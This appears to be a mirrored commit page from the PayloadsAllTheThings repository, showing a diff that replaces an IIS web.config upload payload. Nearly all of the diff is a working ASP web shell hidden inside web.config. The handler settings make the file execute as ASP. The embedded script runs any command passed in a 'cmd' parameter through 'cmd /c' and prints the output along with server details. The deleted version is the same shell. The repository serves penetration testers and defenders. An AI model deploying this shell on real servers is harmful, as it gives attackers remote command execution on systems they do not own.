mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-01-30 23:25:03 +00:00
Merge pull request #412 from A1vinSmith/master
Replace the web.config with the far better version web.web.config
This commit is contained in:
Swissky
GitHub
commit
19c7d1c9e8
@ -1,8 +1,8 @@
|
||||
<?xml version="1.0″ encoding="UTF-8″?>
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<configuration>
|
||||
<system.webServer>
|
||||
<handlers accessPolicy="Read, Script, Write">
|
||||
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
|
||||
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
|
||||
</handlers>
|
||||
<security>
|
||||
<requestFiltering>
|
||||
@ -15,20 +15,51 @@
|
||||
</requestFiltering>
|
||||
</security>
|
||||
</system.webServer>
|
||||
<appSettings>
|
||||
</appSettings>
|
||||
</configuration>
|
||||
<!–
|
||||
<% Response.write("-"&"->")
|
||||
Response.write("</p>
|
||||
<pre>")</p>
|
||||
<p>Set wShell1 = CreateObject("WScript.Shell")
|
||||
Set cmd1 = wShell1.Exec("whoami")
|
||||
output1 = cmd1.StdOut.Readall()
|
||||
set cmd1 = nothing: Set wShell1 = nothing</p>
|
||||
<p>Response.write(output1)
|
||||
Response.write("</pre>
|
||||
<p><!-"&"-") %>
|
||||
–>
|
||||
<!--
|
||||
<% Response.write("-"&"->")%>
|
||||
<%
|
||||
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
|
||||
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
|
||||
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
|
||||
|
||||
<!-- web.config payload from https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/ -->
|
||||
Function getCommandOutput(theCommand)
|
||||
Dim objShell, objCmdExec
|
||||
Set objShell = CreateObject("WScript.Shell")
|
||||
Set objCmdExec = objshell.exec(thecommand)
|
||||
|
||||
getCommandOutput = objCmdExec.StdOut.ReadAll
|
||||
end Function
|
||||
%>
|
||||
|
||||
<BODY>
|
||||
<FORM action="" method="GET">
|
||||
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
|
||||
<input type="submit" value="Run">
|
||||
</FORM>
|
||||
|
||||
<PRE>
|
||||
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
|
||||
<%Response.Write(Request.ServerVariables("server_name"))%>
|
||||
<p>
|
||||
<b>The server's port:</b>
|
||||
<%Response.Write(Request.ServerVariables("server_port"))%>
|
||||
</p>
|
||||
<p>
|
||||
<b>The server's software:</b>
|
||||
<%Response.Write(Request.ServerVariables("server_software"))%>
|
||||
</p>
|
||||
<p>
|
||||
<b>The server's software:</b>
|
||||
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
|
||||
<% szCMD = request("cmd")
|
||||
thisDir = getCommandOutput("cmd /c" & szCMD)
|
||||
Response.Write(thisDir)%>
|
||||
</p>
|
||||
<br>
|
||||
</BODY>
|
||||
|
||||
|
||||
|
||||
<%Response.write("<!-"&"-") %>
|
||||
-->
|
||||
|
||||
@ -1,65 +0,0 @@
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<configuration>
|
||||
<system.webServer>
|
||||
<handlers accessPolicy="Read, Script, Write">
|
||||
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
|
||||
</handlers>
|
||||
<security>
|
||||
<requestFiltering>
|
||||
<fileExtensions>
|
||||
<remove fileExtension=".config" />
|
||||
</fileExtensions>
|
||||
<hiddenSegments>
|
||||
<remove segment="web.config" />
|
||||
</hiddenSegments>
|
||||
</requestFiltering>
|
||||
</security>
|
||||
</system.webServer>
|
||||
</configuration>
|
||||
<!--
|
||||
<% Response.write("-"&"->")%>
|
||||
<%
|
||||
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
|
||||
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
|
||||
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
|
||||
|
||||
Function getCommandOutput(theCommand)
|
||||
Dim objShell, objCmdExec
|
||||
Set objShell = CreateObject("WScript.Shell")
|
||||
Set objCmdExec = objshell.exec(thecommand)
|
||||
|
||||
getCommandOutput = objCmdExec.StdOut.ReadAll
|
||||
end Function
|
||||
%>
|
||||
|
||||
<BODY>
|
||||
<FORM action="" method="GET">
|
||||
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
|
||||
<input type="submit" value="Run">
|
||||
</FORM>
|
||||
|
||||
<PRE>
|
||||
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
|
||||
<%Response.Write(Request.ServerVariables("server_name"))%>
|
||||
<p>
|
||||
<b>The server's port:</b>
|
||||
<%Response.Write(Request.ServerVariables("server_port"))%>
|
||||
</p>
|
||||
<p>
|
||||
<b>The server's software:</b>
|
||||
<%Response.Write(Request.ServerVariables("server_software"))%>
|
||||
</p>
|
||||
<p>
|
||||
<b>The server's software:</b>
|
||||
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
|
||||
<% szCMD = request("cmd")
|
||||
thisDir = getCommandOutput("cmd /c" & szCMD)
|
||||
Response.Write(thisDir)%>
|
||||
</p>
|
||||
<br>
|
||||
</BODY>
|
||||
|
||||
|
||||
|
||||
<%Response.write("<!-"&"-") %>
|
||||
-->
|
||||
Loading…
Reference in New Issue
Block a user